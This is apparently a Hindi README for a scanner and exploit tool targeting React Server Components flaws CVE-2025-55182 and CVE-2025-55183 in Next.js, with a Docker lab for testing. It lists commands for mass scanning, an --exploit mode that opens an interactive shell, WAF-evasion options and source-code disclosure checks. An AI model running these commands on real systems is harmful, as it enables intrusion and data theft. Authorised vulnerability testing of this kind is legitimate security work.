
React Server Components (RSC) में एक गंभीर Remote Code Execution (RCE) भेद्यता। इसमें भेद्यता का सुरक्षित परीक्षण और समझने के लिए एक यथार्थवादी 'Lab Environment' भी शामिल है।
इस रिपॉजिटरी में Next.js React Server Components (RSC) में CVE-2025-55182 (RCE) और CVE-2025-55183 (स्रोत कोड प्रकटीकरण) के लिए एक स्कैनर टूल है।
यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। इस टूल का उपयोग उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।
विस्तृत तकनीकी विश्लेषण के लिए, कृपया देखें: https://react2shell.com/
pip3 install -r requirements.txt
जाँचें कि कोई लक्ष्य URL कमजोर है या नहीं।
python3 CVE-2025-55182.py -u <url>
एक फ़ाइल से होस्ट की सूची स्कैन करें (प्रति पंक्ति एक)।
python3 CVE-2025-55182.py -l <hosts_file>
कमजोर लक्ष्य पर एक इंटरैक्टिव शेल प्राप्त करें।
python3 CVE-2025-55182.py -u <url> --exploit
जाँचें कि कोई लक्ष्य सर्वर क्रियाओं के माध्यम से स्रोत कोड लीक करता है या नहीं।
python3 CVE-2025-55182.py -u <url> --nextjs-rsc-source-code-disclosure
RCE का प्रयास करने के बजाय साइड-चैनल डिटेक्शन (समय/त्रुटि आधारित) का उपयोग करें।
python3 CVE-2025-55182.py -u <url> --safe-check
WAF सामग्री निरीक्षण को बायपास करने के लिए जंक डेटा जोड़ें या विशिष्ट बाईपास का उपयोग करें।
# Standard WAF bypass (junk data)
python3 CVE-2025-55182.py -u <url> --waf-bypass --waf-bypass-size 128
# Vercel WAF bypass variant
python3 CVE-2025-55182.py -u <url> --vercel-waf-bypass
# Custom headers
python3 CVE-2025-55182.py -u <url> -H "Authorization: Bearer token" -H "X-Custom: Header"
# Proxy usage
python3 CVE-2025-55182.py -u <url> --proxy http://127.0.0.1:8080
# Random User-Agent and Delay
python3 CVE-2025-55182.py -u <url> --random-agent --delay 2.0
# Scan specific path
python3 CVE-2025-55182.py -u <url> --path /_next --path /api
परिणामों को JSON, CSV या HTML प्रारूप में फ़ाइल में सहेजें। --all-results फ़्लैग कमजोर और गैर-कमजोर दोनों होस्ट को सहेजता है।
python3 CVE-2025-55182.py -u <url> -o results.json --format json --all-results
आप प्रदान की गई Docker इमेज का उपयोग करके परीक्षण के लिए एक कमजोर इंस्टेंस चला सकते हैं:
docker build -t cve-local .
docker run --rm -p 3000:3000 cve-local
Vercel सुरक्षा अनुसंधान में रुचि है? हमारा सहयोगी अनुसंधान दस्तावेज़ देखें:
📄 VERCEL_RESEARCH.md - इसके लिए एक व्यापक मार्गदर्शिका:
चर्चा में शामिल होने के लिए research लेबल के साथ एक issue खोलें!
| Argument | विवरण |
|---|
-u, --url | जाँच करने के लिए एकल URL/होस्ट। |
-l, --list | स्कैन करने के लिए होस्ट की सूची वाली फ़ाइल। |
--exploit | इंटरैक्टिव शेल मोड दर्ज करें (-u आवश्यक)। |
--nextjs-rsc-source-code-disclosure | स्रोत कोड प्रकटीकरण की जाँच करें (CVE-2025-55183)। |
-t, --threads | समवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट: 10)। |
--timeout | सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)। |
-o, --output | परिणामों के लिए आउटपुट फ़ाइल। |
--format | आउटपुट प्रारूप: json, csv, html। |
--all-results | सभी परिणाम सहेजें, न कि केवल कमजोर वाले। |
-k, --insecure | SSL प्रमाणपत्र सत्यापन अक्षम करें। |
-H, --header | 'Key: Value' प्रारूप में कस्टम हेडर। |
--path | परीक्षण के लिए कस्टम पथ (जैसे, '/_next')। |
--path-file | परीक्षण के लिए पथों की सूची वाली फ़ाइल। |
--safe-check | RCE PoC के बजाय सुरक्षित साइड-चैनल डिटेक्शन का उपयोग करें। |
--windows | Windows PowerShell पेलोड का उपयोग करें। |
--waf-bypass | WAF को बायपास करने के लिए जंक डेटा जोड़ें। |
--waf-bypass-size | WAF बाईपास के लिए जंक डेटा का आकार KB में। |
--vercel-waf-bypass | Vercel WAF बाईपास पेलोड का उपयोग करें। |
--bypass-variant | विशिष्ट WAF बाईपास वैरिएंट (1-102) या 'all' चुनें। |
-x, --proxy | प्रॉक्सी URL (जैसे, http://127.0.0.1:8080)। |
--random-agent | प्रत्येक अनुरोध के लिए यादृच्छिक User-Agent का उपयोग करें। |
--delay | अनुरोधों के बीच सेकंड में देरी। |
-v, --verbose | विस्तृत आउटपुट (प्रतिक्रिया स्निपेट दिखाएं)। |
-q, --quiet | शांत मोड (केवल कमजोर होस्ट दिखाएं)। |
--no-color | रंगीन आउटपुट अक्षम करें। |